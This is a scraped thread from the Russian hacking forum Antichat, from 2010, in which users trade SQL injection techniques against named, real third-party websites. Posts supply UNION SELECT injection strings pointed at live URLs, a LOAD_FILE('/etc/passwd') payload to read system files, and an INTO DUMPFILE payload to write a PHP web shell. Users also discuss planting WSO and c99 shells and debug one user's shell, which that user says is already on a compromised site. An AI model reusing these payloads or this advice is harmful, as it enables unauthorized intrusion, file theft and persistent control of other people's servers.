Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.03.2010, 00:15
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от jecka3000
проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user
если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?
в базе данных "mysql" информация о юзверях всегда в табличке "user", во-первых.
Во вторых, для начала проверь есть ли доступ к "mysql.user" - если нет, то file_priv в 95% случаев нет
Смотришь, есть ли доступ к mysql.user.
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+2,2,3,4+from+mysql.user
Доступа нет.
Последний раз редактировалось попугай; 30.03.2010 в 00:18..
|
|
|
30.03.2010, 00:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
если нету доступа, то другими способами средствами SQL залить шелл реально?
|
|
|
|
30.03.2010, 00:24
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
нет, с помощью скули не залить если нет условий для создания файла на серваке посредством БД
|
|
|
|
30.03.2010, 11:08
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 8
Провел на форуме:
22180
Репутация:
0
|
|
Подскажите, пожалуйста, есть здесь SQL Иньекция или нет?
http://www.klipart.ru/package.php?id=symmetricspiders'
|
|
|
|
30.03.2010, 11:51
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от olishort
нашел sql уязвимость
выдает ошибку
PHP код:
SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '595'' AND status = 'active' failed with error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'active'' at line 3
после SELECT * FROM mobiticket.structure_page WHERE tag = '595'' идет AND
до AND сработает union? /* не обрыв строки? спасибо! Чего бы и нет.
-1'+union+select+1+--+ и т.д.
|
|
|
|
30.03.2010, 13:51
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от jecka3000
ребят, хочу залить шелл посредством SQL, а именно:
union+select+1,'<?php код вашего шелла ?>',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*
php код вашего шелла - сюда не вариант ведь пихать весь код, например, шелла от madnet'a.
Посоветуйте, какой "мини" шелл или команду выполнить там, чтобы потом можно было залить полноценный шелл?
если есть все условия для шела через скуль, то мона форму загрузки файла с оброботчиком запихнуть, а потом через веб залить нормальный шелл, как вариант
Последний раз редактировалось Strilo4ka; 30.03.2010 в 13:54..
|
|
|
|
30.03.2010, 15:43
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
я только что залил шелл wso 2.4 на сайт, но при попытке зайти пишется:
Fatal error: Call to undefined function: gzinflate()
сервер - Apache/2.0.59 (Unix) PHP/4.4.6
c99 нормально работает, но всё-таки хотелось бы узнать причину..
Последний раз редактировалось daniel_1024; 30.03.2010 в 15:46..
|
|
|
|
30.03.2010, 16:05
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
wso походу сжат и использует функцию gzinflate() для распаковки данных. возможно на сервере отключена или не инсталлирована эта функция(библиотека)
|
|
|
|
30.03.2010, 22:15
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
не могу проверить привилегии
http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,file_priv,3,4,5,6,7+from+mysql.u ser+where+user='tourismepmysql'--
доступ к mysql.user вродь есть, в чем трабла?
|
|
|
|
30.03.2010, 22:18
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
С помощью LOAD_FILE проверь.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
